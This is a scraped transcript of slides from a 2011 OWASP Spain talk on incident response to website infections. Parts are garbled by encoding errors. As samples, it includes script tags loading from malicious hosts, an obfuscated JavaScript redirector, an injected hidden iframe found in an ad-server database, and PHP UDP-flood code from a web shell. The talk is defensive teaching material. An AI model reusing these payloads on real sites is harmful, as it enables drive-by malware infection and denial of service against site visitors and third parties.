Explorar

o Amenaza ?

download Demanda

Transcripción

o Amenaza ? 
4/26/11
¿ Comida
o Amenaz
a?
Respuesta a incidentes en infecciones web
Carles Fragoso Mariscal
VII OWASP Spain Chapter Meeting ! Barcelona, 15 de Abril del 2011
Organiza:
Patrocina:
Colabora:
2
1
4/26/11
#$%&'()*%"+,-.+/0"
– 
– 
– 
– 
– 
Departament de Governació
Secretaria de Telecomunicacions i Societat de la Informació
Departament d’Interior
Departament d’Innovació, Universitats i Empresa
Centre de Telecomunicacions i Tecnologies de la Informació de
la Generalitat de Catalunya
• 
Agència ACC1Ó
• 
Consorci Administració Oberta de Catalunya
• 
Ajuntament de Reus
• 
Consell de Cambres de Comerç de Catalunya
• 
e-la Caixa
• 
Fundació Barcelona Digital
• 
Universitat Rovira i Virgili
!"
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. 
2. 
3. 
4. 
Contexto
Tendencias de ataque
Respuesta a Incidentes
Conclusiones
2
4/26/11
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. 
2. 
3. 
4. 
Contexto
Tendencias de ataque
Respuesta a Incidentes
Conclusiones
enda…
¿En qué ti
entrarías?
ito
Jorg
a
Perico
Drupa
Lupit
l
la
Joom
Nuke
PHP
teban
La Es S
CM
3
4/26/11
+7%52:57;"/<2%523"
•  Contenidos
–  Propietario de los contenidos/información/marca
–  Operadores/Usuarios de generación/administración de contenidos
–  Usuarios/visitantes
•  Plataforma tecnológica
–  Administradores/operadores de la plataforma
–  Proveedores de hosting/housing/cloud
•  Infraestructura, servicio, aplicación"
–  Empresas de desarrollo o integración
–  Proveedores de contenidos terceros (ads, widgets!)
•  Seguridad
–  Proveedores de listas de reputación
–  Fabricantes de detección/contención de código malicioso
des ?
bilida
a
s
n
o
p
–  Proveedores de auditoria/revisión de aplicaciones/código
¿ Res
¿Qué com
prarías
="
4
4/26/11
+7%52:57;"+)92>(>)?2%"
•  Los delincuentes y mafias de toda la vida se han pasado a la Internet
motivados por:
– 
– 
– 
– 
Incremento del uso por parte de los usuarios
Vulnerabilidad de los sistemas
Facilidad y “anonimato” a la hora de realizar acciones remotamente
“Vacío” o lentitud en el ámbito legal-judicial
•  Estos han motivado la creación de toda una colección de software
malicioso y servicios pensados para el cibercrimen
–  Código malicioso para múltiples entornos (escritorio, web...)
–  Paneles de control y administración de sistemas infectados
•  Las nuevas ‘armas digitales’ permiten realizar:
–  Robo de credenciales, datos bancarios y personales, etc.
–  Envío de correo basura
–  Ataques de denegación de servicio
ISP de cibercrim
• 
Bla
10
5
4/26/11
Listado de “Exploit Packs”
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
Adrenaline Pack
Eleonore
LuckySploit
Fragus
ElFiesta
Napoleon Sploit
Siberia
Unique Pack
JustExploit
Sploit25
Phoenix Zeus
Liberty
Neon
ZoPAck
6
4/26/11
Lista de familias de código malicioso
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
BlackEnergy
Kraken
Waledac/Storm/Nuwar
Srizbi
Gumblar
Sinowal/Torpig
Ozdok
Pushdo
Zeus
Koobface
Spyeye
Oficla/Sasfis
Mariposa
13
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. 
2. 
3. 
4. 
Contexto
Tendencias
Respuesta a Incidentes
Conclusiones
7
4/26/11
@>79'9)A)&'&"&2"B)3$'A)C'()*%"829")%62(5'&'"
Fuente: Dasient Smartweb Security
www.piltrafilla.net
¡¡Reputación!!!
8
4/26/11
¡Infección!
DE"
¿Cómo nos…
atacan?
9
4/26/11
02%&2%()'3;"+*&)<7"?'A)()737"
•  Punto de inserción
–  Código fuente
–  Ficheros de inclusión
–  Entradas en base de datos
•  Formato
–  Scripts (javascript)
–  Marcos (iframe)
–  Objetos (java, flash, PDF")
•  Técnicas antiforenses
–  Ofuscación de código
–  Detección de crawlers y IPs de CERT/LEO
–  Detección de herramientas forenses
+*&)<7"?'A)()737"2%"F(G2>7"'%2:'&7"
</div>
</div>
</div>
<script src="http://nt010.cn/E/J.JS"></script><script src='http://
nt004.cn/E/J.JS'></script></body>
</html>
<html><body><script>function decoder(){var gfh=new Array
(213,57,39,219,247,55,122,92,13,198,41,6,217,113,106,222,203,43,9,1
80,77,250,123,222,235,119,203,90,81,168);var scp=28;for(;scp>=1;)
{gfh[scp]=((((~gfh[scp])&0xff)>>7)|((((~gfh[scp])&0xff)<<1)&0xff))
^gfh[0];scp--;}var scp=3;while(scp<=28){gfh[scp]=((((~gfh[scp])
&0xff)^gfh[2])>>4)|(((((~gfh[scp])&0xff)^gfh[2])<<4)&0xff);scp++;}
var scp=1;do{if(scp>27)break;gfh[scp]=((((((-gfh[scp])&0xff)<<7)
&0xff)|(((-gfh[scp])&0xff)>>1))-234)&0xff;scp++;}while(true);return
String.fromCharCode(gfh[1],gfh[2],gfh[3],gfh[10],gfh[14],gfh
[16],gfh[18],gfh[20],gfh[21],gfh[23],gfh[24],gfh[26],gfh[27],gfh
[28]);}window.location="/E/J.JS?"+decoder();</
script><br><br><center><h3><B7><C3><CE><CA><B1><BE><D2><B3><C3><E6>
<A3><AC><C4><FA><B5><C4><E4><AF><C0><C0><C6><F7><D0><E8><D2><AA><D6
><A7><B3><D6>JavaScript</h3></center></body></html>
HI"
10
4/26/11
+*&)<7"?'A)()737"2%"2%5>'&'"9'32"&2"&'573"
mysql> select * from ox_audit where date_sub(’YYYY-MM-DD',
interval 1 day) <= updated;
| auditid | actionid | context
| contextid | parentid |
details
| userid | username
| usertype | updated
|
account_id | advertiser_account_id | website_account_id |
|
1234 |
2 | banners
|
123|
NULL | a:
3:{s:6:"append";a:2:{s:3:"was";s:0:"";s:2:"is";s:
137:"<iframe src="http://A.B.C.D/tds/in.cgi?default"
width="1" height="1" hspace="0" vspace="0" frameborder="0"
scrolling="no"></iframe>";}s:8:"key_desc";s:36:”CAMPAIGN
NAME";s:10:"campaignid";s:3:"168";}
|
1 | user |
0 | YYYY-MM-DD HH:MM:SS |
1 |
12
|
NULL |
02%&2%()'3;"/9$37"
• 
• 
• 
• 
Distribución de código malicioso
Denegación de servicio
Envío de correo basura
Redirección a contenidos: phishing, venta de viagra"
11
4/26/11
J>22%-G2AA;"K7-"LK@"M77&2>"N)%52>6'(2O"
J>22%-G2AA;"K7-"LK@"M77&2>"N(*&)<7O"
for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$pakits++;
if(time() > $max_time){ break; }
$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<br><b>UDP Flood</b><br>Completed with $pakits (" .
round(($pakits*65)/1024, 2) . " MB) packets averaging ".
round($pakits/$exec_time, 2) . " packets per second \n";
echo '<br><br>
12
4/26/11
-2%&07;",%BP7"&2"(7>>27"9'3$>'"Q"4G)3G)%<"
02%&2%()'3;"R2(57>"&2"'5'S$2"
•  Compromiso masivo mediante vulnerabilidades
–  Ej: IIS/ASP (Lizamoon), diversos CMS"
•  Inserción de código malicioso en anuncios
–  Ej: Software anuncios (OpenX), redes de terceros"
•  Robo de credenciales FTP/HTTP
–  Ej: Botnet Bredolab
13
4/26/11
HE"
.%62(()*%"!"##$%&"T42%U"
14
4/26/11
.%62(()*%"47>">797"&2"(>2&2%()'A23;"@)2C'3"
'()*+,-"
V)5"
J2357>"
!+-#$-.
+*&)<7"
?'A)()737.
!+-.
/0,&0,#1"
V)5"
23%,)-"
&2")%62(()*%"
12(7A2(57>"
&2"
(>2&2%()'A23.
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"+7%52:57"
Atacante
Víctimas
Propietario
Administrador
15
4/26/11
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"@>24'>'()*%!
1
Alojamiento de
crimeware
12(7A2(57>"
(>2&2%()'A3.
J2357>"
4+-#$-.
2
Publicar contenidos de
phishing o de ingeniería social
W)5"&2"(7&)"
'()*+,-.
W)5"&2"
423('"
2A2(5>X%)('.
3
Engaño al administrador con
técnicas de ingeniería social
Mensajería
Correo electrónico
Redes sociales
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;",%<'Z7"
5
Gestor de bots y
recepción de credenciales
12(7A2(57>"
(>2&2%()'A3.
4
J2357>"
4+-#$-.
Administrador infectado
con código malicioso bot
Y75.
16
4/26/11
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;".%62(()*%"
6
Procesado de credenciales y
preparación infección
-(>)45"
.%62(()*%.
12(7A2(57>"
(>2&2%()'A23.
7
Infección de páginas web
con credenciales robadas
Y75.
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;".%62(()*%"
9
Infección y control de
nuevos sistemas
J2357>"
4+-#$-.
7
Accesos legítimos
al servidor web
'()*+,-"
V)5.
8
Entrega de código
infectado a los usuarios
Y75.
17
4/26/11
.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"+7%5>7A"
10
Administración de
sistemas infectados
Y75.
J2357>"
4+-#$-.
Y75.
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. 
2. 
3. 
4. 
Contexto
Tendencias
Respuesta a Incidentes
Conclusiones
18
4/26/11
1234$235'"'")%()&2%523"["'%\A)3)3"67>2%32"
+,-'./!
•  Gestores
•  Analistas
•  Forenses
•  Consultores
"#$$%&'#()%*!
•  Kit de respuesta
•  Intercepción
•  Entorno de pruebas
•  Herramientas forenses
0$/1#*/*!
•  Recogida de evidencias
•  Análisis de información
•  Ingeniería inversa
•  Análisis forense
•  Investigación
#A$]7"&2">234$235'"'")%()&2%523"
2#*.-#*)%!
$#&/)%!
45,-'*'1'6(!
7!.$#*#$8%1'6(!
4(93'*'*!7!
'(8#*:;%1'6(!
<(=/$&#*!
2#*.-#*)%!
.$#*#(1'%3!
!="
19
4/26/11
1234$235'"'")%()&2%523"
C/:D1%1'6(!
45,-'*'1'6(!7!
.$#%(93'*'*!
>#)#11'6(!
7!)$'%?#!
2#1-.#$%1'6(!
<(=/$&#!
4(@3'*'!
B/()#(1'6(!
+$$%5'1%1'6(!
A#;-'&'#()/!
1234$235'"'")%()&2%523;"^257&7A7<P'"
•  Preparación
–  Entorno “sandbox” con las herramientas adecuadas y con
conectividad limitada y de forma anónima (proxies)
–  Kit de respuesta presencial (portátil, sonda, maletín")
–  Procedimiento de recogida de información en clientes y servidores
•  Respuesta
–  Revisión estática/dinámica desde entorno sandbox con
herramientas de control del navegador (protección)
–  Scripts de revisión de servidor para identificar elementos infectados
–  Contención/monitorización mediante firmas WAF/IPS
–  Recogida de información preliminar de fuentes de inteligencia
–  Procedimiento de limpieza de máquinas infectadas
–  Coordinación/actuación sobre dominios y IPs de terceros
•  Análisis
–  Análisis dinámico con herramientas tipo sandbox
–  Ingeniería inversa de código malicioso y otros artefactos
20
4/26/11
<()#$(#)
!
B/$)%=-#;/*!
2/-)#$*!!
8'$)-%3#*!
+()/$(/!5#!'(8#*:;%1'6(!
+()/$(/!!
5#!.$-#E%*!
+()/$(/!5#!
8'$)-%3')F%1'6(!
1234$235'"'".%()&2%523;"_2>>'?)2%5'3"&2"'%\A)3)3"
• 
Análisis dinámico
–  Wepawet
http://wepawet.iseclab.org/
–  Anubis
http://anubis.iseclab.org/
• 
Deofuscación
–  Jsunpack
http://jsunpack.jeek.org/
–  Malzilla
http://malzilla.sourceforge.net/
• 
Revisión de código malicioso
–  Virustotal
–  Team Cymru Malware Hash Database
• 
Otros
–  Firefox plugins: Adblock, Noscript, StopAutoplay, Flashblock
–  Wireshark/Tshark ! Sysinternal Tools
–  Fiddler / FiddlerCap
http://www.fiddler2.com/fiddler2/
–  Fireshark
http://fireshark.org/
`H"
21
4/26/11
_2>>'?)2%5'3;"#)&&A2>"N5$!.6$!711$%O"
_2>>'?)2%5'3;"#)&&A2>+'4"N3")-7%"6+%O"
22
4/26/11
#)>23G'>V;"a29"/%'A[3)3""
`b"
Q2 2010: Infection Library
.%67>?'()*%"&2")%52A)<2%()';"K'3)2%5".%62(c7%"d)9>'>["
23
4/26/11
.%67>?'()*%"&2")%52A)<2%()';"#)%&)%<"17<$,"e2587>V3"
www.maliciousnetworks.org
1234$235'"'".%()&2%523;".%67>?'()*%"&2")%52A)<2%()'"
•  ABUSE.CH Malware Database
http://amada.abuse.ch/
•  Malc0de Database
http://malc0de.com/database/index.php
•  Malware Domain List
http://www.malwaredomainlist.com/mdl.php
•  Host Exploit
http://hostexploit.com/
•  Malicious Networks
http://www.maliciousnetworks.org
•  Google Safebrowsing
http://www.google.com/safebrowsing/diagnostic?site=dominio.tld
`="
24
4/26/11
1234$235'"'")%()&2%523"2%")%62(()7%23"829"
1. 
2. 
3. 
4. 
Contexto
Tendencias
Respuesta a Incidentes
Conclusiones
Conclusiones
25
4/26/11
+7%(A$3)7%23"
•  Las infecciones de tipo web se están incrementado exponencialmente
•  Los navegadores web siguen contando con vulnerabilidades
sobretodo en los complementos de terceros
•  Los servidores web siguen siendo expuestos debido a
vulnerabilidades en los CMS y por el robo de credenciales de sus
operadores/administradores
•  Los sistemas de reputación están ayudando ante incidentes masivos
pero no son una bala de plata
•  La sofisticación del código malicioso web va en aumento para evitar
su detección y análisis
bD"
1=$%;/*/G1#*'1%)H1%)!!!888f(23)('5f('5"
52
G1#*'1%)
26

Documentos relacionados

3m scp716

3m scp716

Más detalles

MATA-ROCAFONDA

MATA-ROCAFONDA

Más detalles

GECLIF. Gestión clínico-financiera y coste por proceso

GECLIF. Gestión clínico-financiera y coste por proceso

Más detalles
2025 © doczz.es
Sobre nosotros | DMCA / GDPR | Abuso